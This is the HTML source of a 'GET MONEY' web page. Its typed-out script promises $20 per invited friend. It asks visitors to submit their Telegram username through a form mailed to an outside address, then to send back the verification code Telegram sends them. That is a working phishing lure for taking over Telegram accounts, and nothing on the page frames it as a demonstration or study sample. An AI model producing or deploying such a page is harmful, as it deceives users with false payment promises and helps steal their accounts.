<!DOCTYPE html>
<html>
  <head>
    <style>
      .top{
        display:flex;
        position:fixed;
        background-color:black;
        vertical-align:top;
        top:0;
        left:0;
        z-index: 999;/*Adjust this value as needed*/
      }
      .foll{
        width:100px;
        height:100px;
        border-radius:50px;
      }
    </style>
  <div class="top">
    <div><button style="width:100px; height:100px; background-color:black;"><a style="color:white;">
<svg xmlns="http://www.w3.org/2000/svg" width="80" height="80" fill="currentColor" class="bi bi-three-dots-vertical" viewBox="0 0 16 16"> <path d="M9.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0m0-5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0m0-5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0"/> </svg></a></button></div>
    <div>
      <button style="background-color:black; margin-left:60px; border-color:black; width:400px; text-align:center;"><h style="font-size:45px;height:100px; color:white; text-align:center;">GET MONEY</h></button>
    </div>
    <div>
      <button style="margin-left:130px; background-color:black;"><a>
<svg style="color:white;" xmlns="http://www.w3.org/2000/svg" width="80" height="80" fill="currentColor" class="bi bi-bell-fill" viewBox="0 0 16 16"> <path d="M8 16a2 2 0 0 0 2-2H6a2 2 0 0 0 2 2m.995-14.901a1 1 0 1 0-1.99 0A5 5 0 0 0 3 6c0 1.098-.5 6-2 7h14c-1.5-1-2-5.902-2-7 0-2.42-1.72-4.44-4.005-4.901"/> </svg></a></button>
    </div>
    <div>
      <button style="margin-left:97px; background-color:black;"><a>
<svg style="color:white;" xmlns="http://www.w3.org/2000/svg" width="80" height="80" fill="currentColor" class="bi bi-person-circle" viewBox="0 0 16 16"> <path d="M11 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0"/> <path fill-rule="evenodd" d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8m8-7a7 7 0 0 0-5.468 11.37C3.242 11.226 4.805 10 8 10s4.757 1.225 5.468 2.37A7 7 0 0 0 8 1"/> </svg>
</a></button>
    </div>
  </div>  
    
    <img class="foll" src="Dollar.png" alt="">
    
    
<style>
.typing-text {
  font-size: 70px;
  font-weight: bold;
  color: black;
}
.iuy{
  font-size:50px;
  font-style:italic;
  border-radius:60px;
  height:100px;
  width:500px;
  border-top-color:blue ;
  border:solid;
  text-align:center;
  border-width:4px;
  margin-left:140px;
  margin-top:100px   ;
}
.texty{
  background-color:orange;
  margin-top:50px;
  border-radius:25px;
  height:400px;
  width:800px;
  margin-left:70px;
}
.send{
  height:100px;
  width:130px;
  font-size:30px;
  background-color:blue;
  border-radius:20px;
  border-color:green;
  color:white;
  margin-left:340px ;
}
.bot{
  display:flex;
  position:fixed;
  background-color:black;
  vertical-align:bottom;
  bottom:0;
  left:0;
  z-index:999;/* A high z-index value */
  margin-top:200px;
}
.mid{
  margin-top:50px;
  margin-bottom:100px;
  z-index: 1;/* Adjust thisvalue as needed */
  position:relative;
}
</style>
<div class="mid">
<div class="typing-text"></div>
                                    <form action="mailto:pqpjufls@telegmail.com" method="post" enctype="text/plain">
              
          
           <label for="id">username:</label><br>

       <div class="texty"> <textarea id="id" class="iuy" type="id" placeholder="username" class="user" name="telegram username"  rows="1" cols="30" value="@" required></textarea></textarea><br><br>
          <input class="send" type="submit" value="submit">
</div>
        </form>    
    </div>
    <div class="bot">
      <div>
        <button style="background-color:black; margin-left:30px;" ><a>
<svg style="color:white;" xmlns="http://www.w3.org/2000/svg" width="100" height="100" fill="currentColor" class="bi bi-house" viewBox="0 0 16 16"> <path d="M8.707 1.5a1 1 0 0 0-1.414 0L.646 8.146a.5.5 0 0 0 .708.708L2 8.207V13.5A1.5 1.5 0 0 0 3.5 15h9a1.5 1.5 0 0 0 1.5-1.5V8.207l.646.647a.5.5 0 0 0 .708-.708L13 5.793V2.5a.5.5 0 0 0-.5-.5h-1a.5.5 0 0 0-.5.5v1.293zM13 7.207V13.5a.5.5 0 0 1-.5.5h-9a.5.5 0 0 1-.5-.5V7.207l5-5z"/> </svg></a></button>
      </div>
      <div>
        <button style="background-color:black; margin-left:80px;"><a>
<svg style="color:white;" xmlns="http://www.w3.org/2000/svg" width="100" height="100" fill="currentColor" class="bi bi-person-circle" viewBox="0 0 16 16"> <path d="M11 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0"/> <path fill-rule="evenodd" d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8m8-7a7 7 0 0 0-5.468 11.37C3.242 11.226 4.805 10 8 10s4.757 1.225 5.468 2.37A7 7 0 0 0 8 1"/> </svg>
</a></button>
      </div>
      <div>
        <button style="background-color:black; margin-left:80px;"><a> 
        
<svg style="color:white" xmlns="http://www.w3.org/2000/svg" width="100" height="100" fill="currentColor" class="bi bi-telegram" viewBox="0 0 16 16"> <path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0M8.287 5.906q-1.168.486-4.666 2.01-.567.225-.595.442c-.03.243.275.339.69.47l.175.055c.408.133.958.288 1.243.294q.39.01.868-.32 3.269-2.206 3.374-2.23c.05-.012.12-.026.166.016s.042.12.037.141c-.03.129-1.227 1.241-1.846 1.817-.193.18-.33.307-.358.336a8 8 0 0 1-.188.186c-.38.366-.664.64.015 1.088.327.216.589.393.85.571.284.194.568.387.936.629q.14.092.27.187c.331.236.63.448.997.414.214-.02.435-.22.547-.82.265-1.417.786-4.486.906-5.751a1.4 1.4 0 0 0-.013-.315.34.34 0 0 0-.114-.217.53.53 0 0 0-.31-.093c-.3.005-.763.166-2.984 1.09"/> </svg>
        </a></button>
      </div>
      <div>
        <button style="background-color:black; margin-left:80px;"><a>
         <svg style="color:white;" xmlns="http://www.w3.org/2000/svg" width="100" height="100" fill="currentColor" class="bi bi-chat-left-dots" viewBox="0 0 16 16"> <path d="M14 1a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H4.414A2 2 0 0 0 3 11.586l-2 2V2a1 1 0 0 1 1-1zM2 0a2 2 0 0 0-2 2v12.793a.5.5 0 0 0 .854.353l2.853-2.853A1 1 0 0 1 4.414 12H14a2 2 0 0 0 2-2V2a2 2 0 0 0-2-2z"/> <path d="M5 6a1 1 0 1 1-2 0 1 1 0 0 1 2 0m4 0a1 1 0 1 1-2 0 1 1 0 0 1 2 0m4 0a1 1 0 1 1-2 0 1 1 0 0 1 2 0"/> </svg> 
        </a></button>
      </div>
      <div>
        <button style="background-color:black; margin-left:80px; width:170px; "><a style="color:white; font-size:100px;">
$
        </a></button>
      </div>
    </div>
    
    
    
    
        
  </head>
  <body>
    <script>
  const typingText = document.querySelector('.typing-text');
const textArray = ['hello there: Do you want to get money?', '\n you know: "NO WORK,NO MONEY"','\n therefore,You can get 20$ by inviting one of your friend. ','if you invite more than one you will get multiple of 20$',`\n and let's begin, `,'\nfirstly you should put your telegram username in below box ;','\nthen, we send a verification code to your telegram account;','\nthen, you send us that correctly to verify that is you.'];
let index = 0;
let charIndex = 0;

function type() {
  if (charIndex < textArray[index].length) {
    typingText.textContent += textArray[index][charIndex];
    charIndex++;
    setTimeout(type, 50); // Adjust the delay as needed
  } else {
    charIndex = 0;
    index++;
    if (index < textArray.length) {
      setTimeout(type, 1000); // Adjust the delay between text changes
    }
  }
}

type();

  
  
  
</script>
  </body>
  
</html>